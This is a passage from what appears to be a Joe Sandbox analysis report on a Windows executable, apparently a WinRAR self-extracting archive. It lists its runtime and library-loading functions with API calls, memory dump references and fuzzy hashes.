                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF70ECFAA83,?,?,?,00007FF70ECF87EE,?,?,?,00007FF70ECF87A9), ref: 00007FF70ECFA939
                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,00000000,00007FF70ECFAA83,?,?,?,00007FF70ECF87EE,?,?,?,00007FF70ECF87A9), ref: 00007FF70ECFA97F
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,00000000,00007FF70ECFAA83,?,?,?,00007FF70ECF87EE,?,?,?,00007FF70ECF87A9), ref: 00007FF70ECFA98B
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                          • API String ID: 2559590344-2084034818
                                                                                                                                                                          • Opcode ID: 6c79a96e063dba16a1b32c7952d051ebac3d8e1187371194647d3fb8a0e2c012
                                                                                                                                                                          • Instruction ID: 8bdf261588a42b8bd931cefae444d1ad6ee965736555a7f4b9c9ca19e384be11
                                                                                                                                                                          • Opcode Fuzzy Hash: 6c79a96e063dba16a1b32c7952d051ebac3d8e1187371194647d3fb8a0e2c012
                                                                                                                                                                          • Instruction Fuzzy Hash: D131C321A1E742A5EE15BB02AC1077AF3A5FF44B60F9A4536DD2D4B390DF3DE5448320
                                                                                                                                                                          Function 00007FF70ECF5094 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(?,?,?,00007FF70ECF5003,?,?,?,00007FF70ECF53BA), ref: 00007FF70ECF50BB
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF70ECF5003,?,?,?,00007FF70ECF53BA), ref: 00007FF70ECF50D8
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF70ECF5003,?,?,?,00007FF70ECF53BA), ref: 00007FF70ECF50F4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                          • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                                                          • API String ID: 667068680-1718035505
                                                                                                                                                                          • Opcode ID: d44736b24ca49afb9e39255391aa9d684b927709e013dababe23d1481c6dad27
                                                                                                                                                                          • Instruction ID: 4999b05e7ddc8e615ef9983db8194625d3a8379883ce5b13231876cc6ef62edc
                                                                                                                                                                          • Opcode Fuzzy Hash: d44736b24ca49afb9e39255391aa9d684b927709e013dababe23d1481c6dad27
                                                                                                                                                                          • Instruction Fuzzy Hash: DB115E20B1DB03A2FD61AB11BD50276D2A2AF19781FC96435DA5D47794EF7DB8848330
                                                                                                                                                                          Function 00007FF70ECF9278 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 191COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: abort$CallEncodePointerTranslator
                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                          • API String ID: 2889003569-2084237596
                                                                                                                                                                          • Opcode ID: 72139495dcf16bb81820f3d810a7b9a0b09b4fcdb0284e32ba8cd3a939180766
                                                                                                                                                                          • Instruction ID: 20821787b7262c31e17f61ab3869007bef28896b5524f6856da76abcf6feba25
                                                                                                                                                                          • Opcode Fuzzy Hash: 72139495dcf16bb81820f3d810a7b9a0b09b4fcdb0284e32ba8cd3a939180766
                                                                                                                                                                          • Instruction Fuzzy Hash: CA91C473A087819AEB10DFA5E8903AEBBA0FB44788F54413AEE4D17B54DF39D195CB00
                                                                                                                                                                          Function 00007FF70ECF83FC Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                          • String ID: csm$f
                                                                                                                                                                          • API String ID: 2395640692-629598281
                                                                                                                                                                          • Opcode ID: 11495064961466997c8733bd3dbf6db7e405d107ed00bd2b81d8cafc23c6a21f
                                                                                                                                                                          • Instruction ID: 76d97e68d5d9db2b4679c46b737e26e0236949375a6b93a84f8cee27d87b0a73
                                                                                                                                                                          • Opcode Fuzzy Hash: 11495064961466997c8733bd3dbf6db7e405d107ed00bd2b81d8cafc23c6a21f
                                                                                                                                                                          • Instruction Fuzzy Hash: 1C51E633A0960297EB58EF11EC14A2AB795FF44B99F918030DE0E47748DF3AE841C720
                                                                                                                                                                          Function 00007FF70ECEB7B8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Show$Rect
                                                                                                                                                                          • String ID: RarHtmlClassName
                                                                                                                                                                          • API String ID: 2396740005-1658105358
                                                                                                                                                                          • Opcode ID: 500699e0308efecee35f99f9c80279572e1dadfe036f1821013dd5e6272eb3e2
                                                                                                                                                                          • Instruction ID: 6f661788161054a14056136e9d80b3980457cf707052ac36a76eceabc88b2c4e
                                                                                                                                                                          • Opcode Fuzzy Hash: 500699e0308efecee35f99f9c80279572e1dadfe036f1821013dd5e6272eb3e2
                                                                                                                                                                          • Instruction Fuzzy Hash: 8A517036A087869AEA34EB25E95437AF760FF85B84F844131DE8E43B65CF3DE8058750
                                                                                                                                                                          Function 00007FF70ECF3810 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: sfxcmd$sfxpar
                                                                                                                                                                          • API String ID: 3540648995-3493335439
                                                                                                                                                                          • Opcode ID: c87641128664e101c09a05c68e21ac71321faf5786322f88757a9baac3bb3a7c
                                                                                                                                                                          • Instruction ID: a66ab8871189825d0c63a3ad0ecd91166574b1bdc329c1ef0319a332837636bf
                                                                                                                                                                          • Opcode Fuzzy Hash: c87641128664e101c09a05c68e21ac71321faf5786322f88757a9baac3bb3a7c
                                                                                                                                                                          • Instruction Fuzzy Hash: 5031AF22E14B46A4EB00AB69EC941ADA371EF48B98F840136DE1D17BA8CF3DD081C360
                                                                                                                                                                          Function 00007FF70ECF3994 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                                                          • API String ID: 0-56093855
                                                                                                                                                                          • Opcode ID: fda320a62b1de8e0c326076fb66231056f5d4cab4133c3dd2cb0763aad417ddf
                                                                                                                                                                          • Instruction ID: 3c114b389104b3afc0fbdc48cf4a992a9048dca4eeb399cf7bc0fbfbffbbeeb3
                                                                                                                                                                          • Opcode Fuzzy Hash: fda320a62b1de8e0c326076fb66231056f5d4cab4133c3dd2cb0763aad417ddf
                                                                                                                                                                          • Instruction Fuzzy Hash: A021F831A0CA8BA1EA10AB6AFC542B5E3A1FF45B88FD40536C98D47364DF3DE595C320
                                                                                                                                                                          Function 00007FF70ECFF490 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                          • Opcode ID: bbfb9acffd6a1f7f328749b5137115e28703a16519561567df947b6386454bd5
                                                                                                                                                                          • Instruction ID: d9ca7058bc2867432d1192147328da94a4d96227a616037b281cdad4ff56ccd6
                                                                                                                                                                          • Opcode Fuzzy Hash: bbfb9acffd6a1f7f328749b5137115e28703a16519561567df947b6386454bd5
                                                                                                                                                                          • Instruction Fuzzy Hash: 32F04F21B1DB4291EF64AB11F894379A760EF88B90F98503AE94F87664DF7CD584C720
                                                                                                                                                                          Function 00007FF70ED07AD4 Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                          • Opcode ID: 5733bc4db78c109f0175e69bb486889a5a1a9f6e1ea72f320297fc23bc50833c
                                                                                                                                                                          • Instruction ID: 9a8342db2a85b179c9bac156eab73566ff67d4af54b3edcdb8e01335ece8f44f
                                                                                                                                                                          • Opcode Fuzzy Hash: 5733bc4db78c109f0175e69bb486889a5a1a9f6e1ea72f320297fc23bc50833c
                                                                                                                                                                          • Instruction Fuzzy Hash: 8E819D22A18A1295F760BF65CC807BDA7A0FF44B98F984136DD0E9B695CF3DA445C330
                                                                                                                                                                          Function 00007FF70ED07448 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3659116390-0
                                                                                                                                                                          • Opcode ID: 9178f81fb76f1e31521b60b80658233a53cfb8d4cb70a9f25aa2f81663bd83bf
                                                                                                                                                                          • Instruction ID: 36cce549ab61a3bae89d90fd10a80d8e2107797d33c78eb0f4ea292635328eae
                                                                                                                                                                          • Opcode Fuzzy Hash: 9178f81fb76f1e31521b60b80658233a53cfb8d4cb70a9f25aa2f81663bd83bf
                                                                                                                                                                          • Instruction Fuzzy Hash: 4D51C532A14A5185E750EF25D8447ACBB70FF44798F884136CE4E8BB99DF38E145C710
                                                                                                                                                                          Function 00007FF70ED028A4 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 190572456-0
                                                                                                                                                                          • Opcode ID: 883fb41bd9703dcc10221343c29cb9d071b7ea0fa4d80864beb1efdaf450b773
                                                                                                                                                                          • Instruction ID: ce64453d8e794e1e21a83514dc501f5822a815242db8597e0d5db541fe6324ec
                                                                                                                                                                          • Opcode Fuzzy Hash: 883fb41bd9703dcc10221343c29cb9d071b7ea0fa4d80864beb1efdaf450b773
                                                                                                                                                                          • Instruction Fuzzy Hash: 48410462B1E60291FA11AB16AC087B9E392FF08BE0F9D4935DD5D8B395DF3CE0408360
                                                                                                                                                                          Function 00007FF70ED08BE8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _set_statfp
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1156100317-0
                                                                                                                                                                          • Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                                                                                                                                          • Instruction ID: 6450d29753ca8652b77cdeaa462b90225a27e6f1fa6512d084ba389fd68f9fed
                                                                                                                                                                          • Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                                                                                                                                          • Instruction Fuzzy Hash: 4811B63AE1DA0349FADC3118FC613758061EF953B0E8C4634E66E835D68F6E64405329
                                                                                                                                                                          Function 00007FF70ECF97EC Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __except_validate_context_recordabort
                                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                                          • API String ID: 746414643-3733052814
                                                                                                                                                                          • Opcode ID: 205f847729b879f197fb1e88d311058e954f7365dfacaef904bdf3b3c6f6727b
                                                                                                                                                                          • Instruction ID: 4ea6503ff57c7dd064ebe011ffb992a45912b138c30c562579d93eed03532e76
                                                                                                                                                                          • Opcode Fuzzy Hash: 205f847729b879f197fb1e88d311058e954f7365dfacaef904bdf3b3c6f6727b
                                                                                                                                                                          • Instruction Fuzzy Hash: 1371D232A086C19ADF64AB65D8A077EBBA0EF84B84F448136DE4D07A85CF3DD5A0C711
                                                                                                                                                                          Function 00007FF70ECFB54C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                          • String ID: $*
                                                                                                                                                                          • API String ID: 3215553584-3982473090
                                                                                                                                                                          • Opcode ID: d78f14ac5553cfb584130670f8383fb7251d5d940d13a47ddc6d8be45c653cc9
                                                                                                                                                                          • Instruction ID: d721c138a95c0b8a764ebb270383d3fc61a111e70a53321080ba3153c8e37c2b
                                                                                                                                                                          • Opcode Fuzzy Hash: d78f14ac5553cfb584130670f8383fb7251d5d940d13a47ddc6d8be45c653cc9
                                                                                                                                                                          • Instruction Fuzzy Hash: 8E51987291DA429AF76CAE35C86437EBBA0EF05B09F941135C64A412D9DF3EEC81C721
                                                                                                                                                                          Function 00007FF70ECF9C30 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateFrameInfo__except_validate_context_recordabort
